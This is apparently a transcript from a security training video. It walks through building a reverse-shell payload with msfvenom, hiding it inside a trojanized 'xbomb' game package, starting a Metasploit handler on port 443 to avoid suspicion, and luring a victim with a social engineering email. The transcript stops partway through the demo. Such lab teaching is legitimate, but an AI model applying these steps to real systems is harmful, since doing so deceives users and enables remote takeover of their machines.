Part 3 - Starting Handler for Reverse Shell

Video Activity

A key component of the reverse shell exploit is a handler that runs on the client machine listening on a designated port for connection requests from the infected target. In this video we review the steps for generating the payload and then packaging it up into an infected installation file. The objective is to trick personnel with access to the vi...

Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
5 hours 38 minutes
Difficulty
Intermediate
CEU/CPE
6
Video Description

A key component of the reverse shell exploit is a handler that runs on the client machine listening on a designated port for connection requests from the infected target. In this video we review the steps for generating the payload and then packaging it up into an infected installation file. The objective is to trick personnel with access to the victim host into installing the infected xbomb game on the target machine. This is typically achieved by a social engineering attack whereby the victim is tricked into clicking on a link, which in turn downloads and installs the infected game on the target.

Video Transcription
00:03
>> Now we're going to use the msfvenom command.
00:03
Do help real quick.
00:03
We can see what options this command takes.
00:03
As we can see this as our standalone payload generator.
00:03
Replaces msfpayload and msfencode.
00:03
They bundle the other functionality into this one tool.
00:03
We can specify which payload we want to use.
00:03
We can look at different output formats,
00:03
choose the architecture.
00:03
We can also eliminate characters to
00:03
avoid which we do have to do
00:03
>> for this particular example.
00:03
>> The command is lengthy to type in.
00:03
Let's make my window a little bit bigger.
00:03
It's going to wrap around anyway
00:03
but I'll explain the options
00:03
that we need as we go through this.
00:03
Msfvenom and I need
00:03
to tell it that my architecture is X86.
00:03
The platform is Linux and I will specify my payload.
00:03
It's a Linux payload
00:03
and I've already looked up this path,
00:03
so I know this is here,
00:03
but you might have to go into
00:03
your payloads and do
00:03
some searches to find the right payload to use.
00:03
This should work on DEBIAN Linux system.
00:03
As long as it's X86 architecture.
00:03
If it was AMD architecture,
00:03
I'll have to specify different architecture for dash
00:03
a as well as the payload would be different.
00:03
Now I'm going to specify my local host.
00:03
That is 192.168.26.129.
00:03
Then I'm going to specify
00:03
the local port and I'm going to use 443.
00:03
That way it doesn't look like a suspicious port when
00:03
the victim system is connected to this website.
00:03
I'm going to exclude hex 0.
00:03
This example needs this a technical discussion
00:03
to why we need to exclude that
00:03
but sometimes when you're encoding a payload,
00:03
certain characters cause problems with compatibility.
00:03
In this one I know I need to exclude this.
00:03
You may have to do
00:03
your own research and a little bit of trial and
00:03
error to get your encoding process to work correctly.
00:03
My output format is going to be
00:03
F. We'll look at the help for formats,
00:03
look at the list after I generate the payload,
00:03
and then my output file.
00:03
Root, backdir, workdir.
00:03
Then I want user games, xbomb_scores.
00:03
That's part of the package I'm replacing it with
00:03
my file that has this payload bundled into it.
00:03
Running the command this takes a few seconds.
00:03
It tells me that it was able to
00:03
encode with the shikata_ga_nai encoder.
00:03
Their popular encoder works quite often.
00:03
Here it tells me that it was 98 bytes and
00:03
was able to create
00:03
the work or create the payload.
00:03
I'll look at the formats real quick.
00:03
There's executable formats
00:03
and then transformation formats.
00:03
Executable formats, I've got
00:03
a lot of different options here.
00:03
F just happens to be the one that
00:03
works correctly for this example.
00:03
You have to trust me on that.
00:03
Now what I need to do is start
00:03
my web server because I want to make sure that I've
00:03
got the webpage in place or
00:03
>> rather available when I want
00:03
>> to get the victim
00:03
to click a link which helps them to visit the website.
00:03
My next step is to create a handler.
00:03
The victim system is going to be,
00:03
when they install the package,
00:03
they will generate a reverse shell
00:03
back to the attack machine.
00:03
So I need to have a handler
00:03
to listen for this connection.
00:03
I can do this from another command line option using
00:03
msfconsole to help for this real quick.
00:03
We see for msfconsole,
00:03
I can specify a lots of different options
00:03
to run commands from
00:03
the command line without having to get into
00:03
the console framework itself.
00:03
We're going to tell it, for instance,
00:03
that we want it to be in
00:03
quiet mode so we don't see the star of
00:03
banner and then I'll
00:03
specify the command I want to execute.
00:03
I'll close that [inaudible] quote,
00:03
so it runs as a complete grant.
00:03
Quiet mode and I'm going to say
00:03
use exploit multi handler.
00:03
If I separate my commands with a semicolon,
00:03
I can run several commands on one line effectively.
00:03
It's a nice way to
00:03
do a lot of work with one simple command.
00:03
Of course, if you were doing this work regularly,
00:03
you would save these commands
00:03
in a file which you could say you
00:03
can just copy and paste them
00:03
or you could find them on your shell history as well.
00:03
Now I want to set the payload.
00:03
Helps if you spell right.
00:03
[LAUGHTER] Payload is going
00:03
to be Linux because we know it's a Linux machine.
00:03
The shell if you recall,
00:03
was an X86 shell, reverse TCP.
00:03
This has to match the pillow that I encoded so that
00:03
the shell will connect to
00:03
the proper handler then the connection should work.
00:03
I need to set my local host and
00:03
that's going to be 192.168.26.129.
00:03
That's the attacker system. Another semicolon.
00:03
I need to set my local port
00:03
and that's going to be 443 as we previously seen.
00:03
Then I'm going to run the exploit itself
00:03
>> and then lastly,
00:03
>> I will exit with a -y so that it doesn't prompt
00:03
me for a connection.
00:03
When this finishes running,
00:03
it should tell me that it's
00:03
binding to my current address.
00:03
My local host is 129 port 443.
00:03
I see which [inaudible] I've
00:03
got my local host, my local port,
00:03
and now the handler is running on
00:03
that website because I
00:03
started up my default apache service on port 443.
00:03
Now what I need to do is go to
00:03
my victim system and startup my web browser.
00:03
I'll go ahead and launch ISE Weasel.
00:03
I can verify that the web server is there
00:03
by typing in it's address.
00:03
There's my default page that you get
00:03
when debit installs Apache.
00:03
I know the website is reachable.
00:03
As I mentioned before,
00:03
through social engineering techniques,
00:03
you would send an email to the victim say,
00:03
"Hey, try this new mind sweeper game
00:03
that I created xbomb."
00:03
As a lot of fun maybe show some screenshots,
00:03
make it look interesting.
00:03
What we're going to do is
00:03
get the file directly by using the wget command.
00:03
I'm going to specify my address.
00:03
This could be in the link, of course,
00:03
that you would send to your victim.
00:03
I have to make sure I get this exactly right.
00:03
2.2a-1_i386.deb. Double check that.
00:03
That looks correct.
00:03
On the victim machine, they click the link.
00:03
It's not what I was expecting.
Up Next